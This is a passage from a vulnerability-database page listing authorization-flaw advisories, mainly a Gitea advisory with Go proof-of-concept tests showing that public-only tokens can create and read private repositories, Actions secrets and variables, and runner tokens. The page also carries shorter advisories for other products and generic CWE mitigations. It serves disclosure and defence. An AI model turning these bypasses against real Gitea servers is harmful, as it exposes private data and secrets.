0o644); err != nil {\n fmt.Fprintf(os.Stderr, \"write temp test: %v\\n\", err)\n os.Exit(2)\n }\n defer func() {\n if err := os.Remove(testPath); err != nil \u0026\u0026 !os.IsNotExist(err) {\n fmt.Fprintf(os.Stderr, \"warning: remove temp test: %v\\n\", err)\n }\n }()\n\n cmd := exec.Command(\"go\", \"test\", \"-timeout\", \"40m\", \"-run\", \"TestAPIPublicOnlyUserReposBypass\", \"code.gitea.io/gitea/tests/integration\")\n cmd.Dir = repo\n cmd.Env = append(os.Environ(), \"SNAP=1\", \"SNAP_NAME=gitea-test\", \"GOTOOLCHAIN=auto\")\n out, err := cmd.CombinedOutput()\n fmt.Printf(\"source=%s\\n\", repo)\n fmt.Print(string(out))\n if err != nil {\n fmt.Fprintf(os.Stderr, \"not reproduced: go test failed: %v\\n\", err)\n os.Exit(1)\n }\n fmt.Println(\"reproduced: public-only,write:user,write:repository can create a private repository through /api/v1/user/repos\")\n fmt.Println(\"reproduced: public-only,read:user,read:repository is still forbidden on the canonical repository endpoint for that repo\")\n fmt.Println(\"reproduced: the same public-only token with the route-required read:user,read:repository scope can list the private repository through /api/v1/user/repos\")\n fmt.Println(\"condition=private user issues public-only tokens with route-required user and repository scopes\")\n fmt.Println(\"cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\")\n}\n\n```\n\n---\n\n## Attachment: `api_public_only_user_actions_secret_variable_bypass_dynamic_poc.go`\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"os\"\n \"os/exec\"\n \"path/filepath\"\n \"strings\"\n)\n\nconst testSource = `// PoC test for private security report.\n// SPDX-License-Identifier: MIT\n\npackage integration\n\nimport (\n \"net/http\"\n \"testing\"\n\n auth_model \"code.gitea.io/gitea/models/auth\"\n \"code.gitea.io/gitea/models/unittest\"\n user_model \"code.gitea.io/gitea/models/user\"\n api \"code.gitea.io/gitea/modules/structs\"\n \"code.gitea.io/gitea/tests\"\n\n \"github.com/stretchr/testify/require\"\n)\n\nfunc TestAPIPublicOnlyUserActionsSecretVariableBypass(t *testing.T) {\n defer tests.PrepareTestEnv(t)()\n\n privateUser := unittest.AssertExistsAndLoadBean(t, \u0026user_model.User{Name: \"user31\"})\n require.True(t, privateUser.Visibility.IsPrivate())\n\n session := loginUser(t, privateUser.Name)\n publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)\n\n MakeRequest(t, NewRequest(t, \"GET\", \"/api/v1/users/user31\").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)\n\n req := NewRequestWithJSON(t, \"PUT\", \"/api/v1/user/actions/secrets/PRIVATE_SECRET\", api.CreateOrUpdateSecretOption{\n Data: \"top-secret\",\n }).AddTokenAuth(publicOnlyWriteUserToken)\n MakeRequest(t, req, http.StatusCreated)\n\n req = NewRequestWithJSON(t, \"POST\", \"/api/v1/user/actions/variables/PRIVATE_VAR\", api.CreateVariableOption{\n Value: \"private-value\",\n Description: \"scoped through public-only token\",\n }).AddTokenAuth(publicOnlyWriteUserToken)\n MakeRequest(t, req, http.StatusCreated)\n\n req = NewRequest(t, \"GET\", \"/api/v1/user/actions/variables/PRIVATE_VAR\").AddTokenAuth(publicOnlyWriteUserToken)\n resp := MakeRequest(t, req, http.StatusOK)\n variable := DecodeJSON(t, resp, \u0026api.ActionVariable{})\n require.Equal(t, \"PRIVATE_VAR\", variable.Name)\n require.Equal(t, \"private-value\", variable.Data)\n\n req = NewRequest(t, \"GET\", \"/api/v1/user/actions/variables\").AddTokenAuth(publicOnlyWriteUserToken)\n resp = MakeRequest(t, req, http.StatusOK)\n variables := DecodeJSON(t, resp, []*api.ActionVariable{})\n found := false\n for _, v := range variables {\n if v.Name == \"PRIVATE_VAR\" \u0026\u0026 v.Data == \"private-value\" {\n found = true\n break\n }\n }\n require.True(t, found)\n}\n`\n\nfunc repoPath() string {\n candidates := []string{}\n if repo := os.Getenv(\"GITEA_REPO\"); repo != \"\" {\n candidates = append(candidates, repo)\n }\n candidates = append(candidates, \"../repo\", \"../../gitea/repo\", \"../../gitea\")\n\n for _, candidate := range candidates {\n if _, err := os.Stat(filepath.Join(candidate, \"routers/api/v1/user/action.go\")); err == nil {\n return filepath.Clean(candidate)\n }\n }\n fmt.Fprintf(os.Stderr, \"could not locate Gitea checkout; tried: %s\\n\", strings.Join(candidates, \", \"))\n os.Exit(2)\n return \"\"\n}\n\nfunc main() {\n repo := repoPath()\n testPath := filepath.Join(repo, \"tests/integration/api_public_only_user_actions_secret_variable_bypass_dynamic_poc_test.go\")\n if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {\n fmt.Fprintf(os.Stderr, \"write temp test: %v\\n\", err)\n os.Exit(2)\n }\n defer func() {\n if err := os.Remove(testPath); err != nil \u0026\u0026 !os.IsNotExist(err) {\n fmt.Fprintf(os.Stderr, \"warning: remove temp test: %v\\n\", err)\n }\n }()\n\n cmd := exec.Command(\"go\", \"test\", \"-timeout\", \"40m\", \"-run\", \"TestAPIPublicOnlyUserActionsSecretVariableBypass\", \"code.gitea.io/gitea/tests/integration\")\n cmd.Dir = repo\n cmd.Env = append(os.Environ(), \"SNAP=1\", \"SNAP_NAME=gitea-test\", \"GOTOOLCHAIN=auto\")\n out, err := cmd.CombinedOutput()\n fmt.Printf(\"source=%s\\n\", repo)\n fmt.Print(string(out))\n if err != nil {\n fmt.Fprintf(os.Stderr, \"not reproduced: go test failed: %v\\n\", err)\n os.Exit(1)\n }\n fmt.Println(\"reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint\")\n fmt.Println(\"reproduced: the same public-only token with the route-required write:user scope can create a user actions secret for the private account\")\n fmt.Println(\"reproduced: the same public-only token with the route-required write:user scope can create, read, and list user actions variables\")\n fmt.Println(\"condition=private user issues a public-only,write:user token\")\n fmt.Println(\"cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\")\n}\n\n```\n\n---\n\n## Attachment: `api_public_only_user_runner_registration_bypass_dynamic_poc.go`\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"os\"\n \"os/exec\"\n \"path/filepath\"\n \"strings\"\n)\n\nconst testSource = `// PoC test for private security report.\n// SPDX-License-Identifier: MIT\n\npackage integration\n\nimport (\n \"net/http\"\n \"testing\"\n\n auth_model \"code.gitea.io/gitea/models/auth\"\n \"code.gitea.io/gitea/models/unittest\"\n user_model \"code.gitea.io/gitea/models/user\"\n \"code.gitea.io/gitea/tests\"\n\n \"github.com/stretchr/testify/require\"\n)\n\nfunc TestAPIPublicOnlyUserRunnerRegistrationBypass(t *testing.T) {\n defer tests.PrepareTestEnv(t)()\n\n privateUser := unittest.AssertExistsAndLoadBean(t, \u0026user_model.User{Name: \"user31\"})\n require.True(t, privateUser.Visibility.IsPrivate())\n\n session := loginUser(t, privateUser.Name)\n publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)\n\n MakeRequest(t, NewRequest(t, \"GET\", \"/api/v1/users/user31\").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)\n\n resp := MakeRequest(t, NewRequest(t, \"POST\", \"/api/v1/user/actions/runners/registration-token\").AddTokenAuth(publicOnlyWriteUserToken), http.StatusOK)\n registrationToken := DecodeJSON(t, resp, \u0026map[string]string{})\n require.NotEmpty(t, (*registrationToken)[\"token\"])\n}\n`\n\nfunc repoPath() string {\n candidates := []string{}\n if repo := os.Getenv(\"GITEA_REPO\"); repo != \"\" {\n candidates = append(candidates, repo)\n }\n candidates = append(candidates, \"../repo\", \"../../gitea/repo\", \"../../gitea\")\n\n for _, candidate := range candidates {\n if _, err := os.Stat(filepath.Join(candidate, \"routers/api/v1/user/runners.go\")); err == nil {\n return filepath.Clean(candidate)\n }\n }\n fmt.Fprintf(os.Stderr, \"could not locate Gitea checkout; tried: %s\\n\", strings.Join(candidates, \", \"))\n os.Exit(2)\n return \"\"\n}\n\nfunc main() {\n repo := repoPath()\n testPath := filepath.Join(repo, \"tests/integration/api_public_only_user_runner_registration_bypass_dynamic_poc_test.go\")\n if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {\n fmt.Fprintf(os.Stderr, \"write temp test: %v\\n\", err)\n os.Exit(2)\n }\n defer func() {\n if err := os.Remove(testPath); err != nil \u0026\u0026 !os.IsNotExist(err) {\n fmt.Fprintf(os.Stderr, \"warning: remove temp test: %v\\n\", err)\n }\n }()\n\n cmd := exec.Command(\"go\", \"test\", \"-timeout\", \"40m\", \"-run\", \"TestAPIPublicOnlyUserRunnerRegistrationBypass\", \"code.gitea.io/gitea/tests/integration\")\n cmd.Dir = repo\n cmd.Env = append(os.Environ(), \"SNAP=1\", \"SNAP_NAME=gitea-test\", \"GOTOOLCHAIN=auto\")\n out, err := cmd.CombinedOutput()\n fmt.Printf(\"source=%s\\n\", repo)\n fmt.Print(string(out))\n if err != nil {\n fmt.Fprintf(os.Stderr, \"not reproduced: go test failed: %v\\n\", err)\n os.Exit(1)\n }\n fmt.Println(\"reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint\")\n fmt.Println(\"reproduced: the same public-only token with the route-required write:user scope can mint a user-level actions runner registration token\")\n fmt.Println(\"condition=private user issues a public-only,write:user token\")\n fmt.Println(\"cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\")\n}\n\n```\n\n---\n\n## Version validation\n\nValidation date: 2026-05-13\n\nThe SSH-key write PoC was used as the representative dynamic test for the systemic `/api/v1/user` self-route public-only bypass.\n\n| Version | Commit | Result |\n|---|---:|---|\n| main | `6a2706626904` | reproduced dynamically |\n| v1.26.1 | `afdbd9b7c5` | reproduced dynamically |\n| v1.25.5 | `f913d90ab6` | reproduced dynamically |\n| v1.24.7 | `99053ce4fa` | reproduced dynamically |\n| v1.23.8 | `cccd54999a` | reproduced dynamically |\n| v1.22.6 | `8eefa1f6de` | reproduced dynamically with Go 1.22.12 test toolchain |\n\nThe representative version-matrix PoC validates the same root cause across tested releases for the SSH-key self-route write surface. The additional lead/supporting PoCs above were retested on the main checkout listed in the Local PoCs section.",
"id": "GHSA-wrr5-99h5-gq57",
"modified": "2026-06-17T18:09:41Z",
"published": "2026-06-17T18:09:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-wrr5-99h5-gq57"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-gitea/gitea"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gitea: Public-only tokens bypass private-resource restrictions on `/api/v1/user` self routes"
}
GHSA-WRX7-QM3P-QW79
Vulnerability from github – Published: 2022-05-13 01:46 – Updated: 2025-04-20 03:33An issue was discovered in network-manager-applet (aka network-manager-gnome) in Ubuntu 12.04 LTS, 14.04 LTS, 16.04 LTS, and 16.10. A local attacker could use this issue at the default Ubuntu login screen to access local files and execute arbitrary commands as the lightdm user. The exploitation requires physical access to the locked computer and the Wi-Fi must be turned on. An access point that lets you use a certificate to login is required as well, but it's easy to create one. Then, it's possible to open a nautilus window and browse directories. One also can open some applications such as Firefox, which is useful for downloading malicious binaries.
{
"affected": [],
"aliases": [
"CVE-2017-6590"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-03-09T19:59:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in network-manager-applet (aka network-manager-gnome) in Ubuntu 12.04 LTS, 14.04 LTS, 16.04 LTS, and 16.10. A local attacker could use this issue at the default Ubuntu login screen to access local files and execute arbitrary commands as the lightdm user. The exploitation requires physical access to the locked computer and the Wi-Fi must be turned on. An access point that lets you use a certificate to login is required as well, but it\u0027s easy to create one. Then, it\u0027s possible to open a nautilus window and browse directories. One also can open some applications such as Firefox, which is useful for downloading malicious binaries.",
"id": "GHSA-wrx7-qm3p-qw79",
"modified": "2025-04-20T03:33:56Z",
"published": "2022-05-13T01:46:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6590"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/ubuntu/+source/network-manager-applet/+bug/1668321"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201707-09"
},
{
"type": "WEB",
"url": "https://www.ubuntu.com/usn/usn-3217-1"
},
{
"type": "WEB",
"url": "https://www.youtube.com/watch?v=Fp2lwRVg0l0"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1037977"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WV26-J37Q-2G7P
Vulnerability from github – Published: 2026-07-02 16:18 – Updated: 2026-07-02 16:18Summary
Slack plugin approvals used the exec approver gate for plugin actions. In affected versions, a Slack user authorized only for exec approvals could resolve a plugin approval through the exec approver gate.
This advisory is scoped to the named feature and configuration. It does not change OpenClaw's trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.
Impact
When the affected feature is enabled and reachable, this could approve a plugin action outside the operator's intended approval split. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path.
Patched Versions
The first stable patched version is 2026.5.12.
Mitigations
keep approval allowlists aligned and review Slack approval actions manually until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.5.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T16:18:24Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nSlack plugin approvals used the exec approver gate for plugin actions. In affected versions, a Slack user authorized only for exec approvals could resolve a plugin approval through the exec approver gate.\n\nThis advisory is scoped to the named feature and configuration. It does not change OpenClaw\u0027s trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.\n\n### Impact\n\nWhen the affected feature is enabled and reachable, this could approve a plugin action outside the operator\u0027s intended approval split. Practical impact depends on the operator\u0027s configuration and whether lower-trust input can reach that path.\n\n### Patched Versions\n\nThe first stable patched version is `2026.5.12`.\n\n### Mitigations\n\nkeep approval allowlists aligned and review Slack approval actions manually until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.",
"id": "GHSA-wv26-j37q-2g7p",
"modified": "2026-07-02T16:18:24Z",
"published": "2026-07-02T16:18:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wv26-j37q-2g7p"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "OpenClaw\u0027s Slack plugin approvals used the exec approver gate for plugin actions"
}
GHSA-WV3H-X6C4-R867
Vulnerability from github – Published: 2026-01-21 09:31 – Updated: 2026-02-13 20:24A flaw was found in the keycloak-services component of Keycloak. This vulnerability allows the issuance of access and refresh tokens for disabled users, leading to unauthorized use of previously revoked privileges, via a business logic vulnerability in the Token Exchange implementation when a privileged client invokes the token exchange flow.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-services"
},
"ranges": [
{
"events": [
{
"introduced": "26.5.0"
},
{
"fixed": "26.5.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-services"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.4.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-14559"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-21T22:30:24Z",
"nvd_published_at": "2026-01-21T07:16:00Z",
"severity": "MODERATE"
},
"details": "A flaw was found in the keycloak-services component of Keycloak. This vulnerability allows the issuance of access and refresh tokens for disabled users, leading to unauthorized use of previously revoked privileges, via a business logic vulnerability in the Token Exchange implementation when a privileged client invokes the token exchange flow.",
"id": "GHSA-wv3h-x6c4-r867",
"modified": "2026-02-13T20:24:37Z",
"published": "2026-01-21T09:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14559"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/issues/45651"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/2d0aa31c4830ebaad094c3762e78b884c141e659"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/d67349f3aa9fed5c61750619d0f9de6356aeaeff"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:2365"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:2366"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-14559"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421711"
},
{
"type": "PACKAGE",
"url": "https://github.com/keycloak/keycloak"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/releases/tag/26.5.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keycloak services allows the issuance of access and refresh tokens for disabled users"
}
GHSA-WV3V-P4HP-955F
Vulnerability from github – Published: 2022-05-24 19:02 – Updated: 2022-10-21 19:01An Improper Access Control vulnerability in the logging component of Bitdefender Endpoint Security Tools for Windows versions prior to 6.6.23.320 allows a regular user to learn the scanning exclusion paths. This issue was discovered during external security research.
{
"affected": [],
"aliases": [
"CVE-2020-15279"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-18T11:15:00Z",
"severity": "LOW"
},
"details": "An Improper Access Control vulnerability in the logging component of Bitdefender Endpoint Security Tools for Windows versions prior to 6.6.23.320 allows a regular user to learn the scanning exclusion paths. This issue was discovered during external security research.",
"id": "GHSA-wv3v-p4hp-955f",
"modified": "2022-10-21T19:01:12Z",
"published": "2022-05-24T19:02:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15279"
},
{
"type": "WEB",
"url": "https://www.bitdefender.com/support/security-advisories/scanning-exclusion-paths-disclosure-in-best-for-windows-va-9380"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
No CAPEC attack patterns related to this CWE.